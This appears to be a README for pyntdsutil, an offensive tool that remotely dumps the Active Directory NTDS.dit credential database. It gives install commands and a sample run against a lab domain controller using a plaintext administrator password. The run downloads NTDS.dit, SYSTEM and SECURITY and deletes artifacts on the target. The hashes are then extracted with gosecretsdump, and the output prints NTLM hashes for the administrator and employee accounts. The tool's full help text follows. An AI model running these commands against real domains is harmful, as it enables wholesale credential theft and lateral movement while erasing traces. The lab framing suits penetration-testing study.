Dump NTDS.dit remotely with ntdsutil.exe via a modified version of atexec.py.
python3 -m pip install pipx && python3 -m pipx ensurepath
python3 -m pipx install git+https://github.com/mrdanielvelez/pyntdsutil
# pyntdsutil CRASH.LAB/Administrator:'Welcome1234!'@192.168.40.136
[*] Connected to 192.168.40.136 as CRASH.LAB\Administrator (Admin!)
[*] Abrupt termination may impact artifact cleanup
[*] Dumping NTDS.dit with ntdsutil.exe
[*] Successfully dumped NTDS.dit
[*] Downloading NTDS.dit, SYSTEM, and SECURITY
[*] Output files to pyntdsutil_2023-10-12_00:17:22
[*] Deleted artifacts on 192.168.40.136 and closed connection
# ls pyntdsutil_2023-10-12_00:17:22
NTDS.dit SECURITY SYSTEM
Fast Offline Dump via Gosecretsdump (installed by default via HACKPREP)
# go install github.com/C-Sto/gosecretsdump@latest
.. SNIP ..
# gosecretsdump -enabled -ntds ./NTDS.dit -system ./SYSTEM -out enabled_ntds.dit
gosecretsdump vDEV (@C__Sto)
Writing to file enabled_ntds.dit
# head enabled_ntds.dit -n 5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:392fbe2844cb258735c4cbf449d31709:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:06a8518bcbf6fd969a2c6ac354d2df00:::
CRASH.LAB\employee1:1103:aad3b435b51404eeaad3b435b51404ee:b2af3f82705748459229772ae2ece0f6:::
CRASH.LAB\employee2:1104:aad3b435b51404eeaad3b435b51404ee:b2af3f82705748459229772ae2ece0f6:::
CRASH.LAB\employee3:1105:aad3b435b51404eeaad3b435b51404ee:b2af3f82705748459229772ae2ece0f6:::
# pyntdsutil -h
usage: pyntdsutil [-h] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k]
[-aesKey hex key] [-dc-ip ip address] [-codec CODEC]
[-output OUTPUT]
target
Dump NTDS.dit remotely with ntdsutil.exe via a modified version of atexec.py.
positional arguments:
target [[domain/]username[:password]@]<target name or
address>
options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass Don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from
ccache file (KRB5CCNAME) based on target parameters.
If valid credentials cannot be found, it will use the
ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256
bits)
-dc-ip ip address IP Address of the domain controller. If omitted it
will use the domain part (FQDN) specified in the
target parameter
-codec CODEC Sets encoding used (codec) from the target's output
(default "utf-8"). If errors are detected, run
chcp.com at the target, map the result with https://do
cs.python.org/3/library/codecs.html#standard-encodings
and then execute pyntdsutilagain with -codec and the
corresponding codec
-output OUTPUT Output directory for NTDS dump